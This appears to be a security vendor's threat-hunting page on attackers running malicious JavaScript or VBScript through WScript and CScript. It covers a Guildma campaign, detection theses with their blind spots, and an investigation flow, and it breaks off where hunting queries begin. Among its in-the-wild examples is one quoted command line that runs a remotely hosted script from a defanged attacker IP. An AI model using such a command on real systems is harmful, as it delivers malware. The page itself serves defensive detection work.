Suspicious script execution via script interpreters

  • Updated on Mar 11, 2024
  • Published on Dec 24, 2023
Prev Next

Attack technique

Technique name: Suspicious Script Execution Via Script Interpreters (WScript/CScript)

MITRE ATT&CK

  • Tactic: Execution
  • Technique: Command and Scripting Interpreter

Technique description
As security defenses evolve, threat actors turn to native tools and built-in functionalities to execute covert malicious activities. Scripting languages (such as Javascript or VBscript) offer attackers a versatile and easily accessible toolkit, enabling them to craft sophisticated malware using existing features for seamless interaction with the OS and networking. These languages also provide an easy way to obfuscate code, complicating detection and analysis efforts. Additionally, scripting languages, being higher level than languages like C or C++, present a user-friendly entry point, making them more accessible for attackers to learn and take advantage of. They also allow for easy modifications of different malware variants, without the need to re-compile code. Given these factors, malicious scripts make an attractive technique for threat actors and we've seen a surge in their use in recent months.

Insights from threat intelligence
In a recent campaign by Guildma, we observed the use of WScript to run remotely hosted JavaScript in an attempt to download an infostealer that gathers sensitive information from the infected system. The JavaScript spawns CMD to launch the next stage of the attack. This aligns with the common technique of threat actors who leverage scripting languages to execute additional LOLBINs and remain stealthy in their campaigns.

In the wild examples

  • WScript.exe "\172[.]86.75.128@8080\pub\iXklskEJ6J5sFz9UtJskfIcRT.jse"
  • CScript.exe "MANAGI~1.JS"

References

Threat hunting theses breakdown

CMD or Powershell spawned by a newly created script

Relevant data sources: EDR Logs

Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created in organizational hosts.

Blind spots

  • Scripts that are created more than 5 minutes before their execution are out of scope in this thesis
  • Scripts that are observed on 10 or more hosts are out of scope in this thesis

Execution of a newly created script file with an invalid extension

Relevant data sources: EDR Logs

Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created in organizational hosts and don’t have a valid script file extension. Threat actors may use a different extension to masquerade the file type and evade detection.

Blind spots

  • Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
  • Scripts that are observed on 10 or more hosts are out of scope in this thesis.

Outbound connection initiated by a newly created script

Relevant data sources: EDR Logs

Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created in organizational hosts and generate an outbound network connection to an external IP or domain. Threat actors commonly use this technique to download the next stage of the attack.

Blind spots

  • Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
  • Scripts that are observed on 10 or more hosts are out of scope in this thesis.

Execution of a newly created script file with a single character name

Relevant data sources: EDR Logs

Thesis explanation
A malicious script is created on a host and subsequently executed with WScript.exe or CScript.exe. The script’s file name consists of a single character only, as observed in various Pikabot campaigns recently reported (e.g.- Q.js). This execution can occur either when a user is tricked into clicking on it or programmatically as part of a prior stage of the attack. The thesis focuses on script files that are rarely created in organizational hosts and have a single-character file name.

Blind spots

  • Scripts that are created more than 5 minutes before their execution are out of scope in this thesis.
  • Scripts that are observed on 10 or more hosts are out of scope in this thesis.

Recommended investigation flow

  • Determine which scripting language was used according to the file extension or the 'e' flag in the WScript/CScript command line, if provided
  • Investigate the origin of the script file. Was it downloaded from the internet? Is it a part of an authorized software suit?
  • Analyze the behavior of the script execution, including any interactions with files and processes. Are there any unusual activities?
  • Investigate outbound network connections initiated by the suspicious script. Does it interact with an external IP or domain? (this may indicate an exfil attempt or the download of a later stage)
  • Cross-reference the script hash (if available) and any contacted IP/domain with threat intelligence feeds to identify known malicious entities.
  • Review historical data to identify any similar script executions or related activities. On how many machines the script name or command line were observed?
  • Did the execution involve user interaction (for example, extraction of the script file from an archive by the user using WinRAR.exe and execution under OpenWith.exe or Explorer.exe), or was it initiated by another program?

Hunting queries

EDR: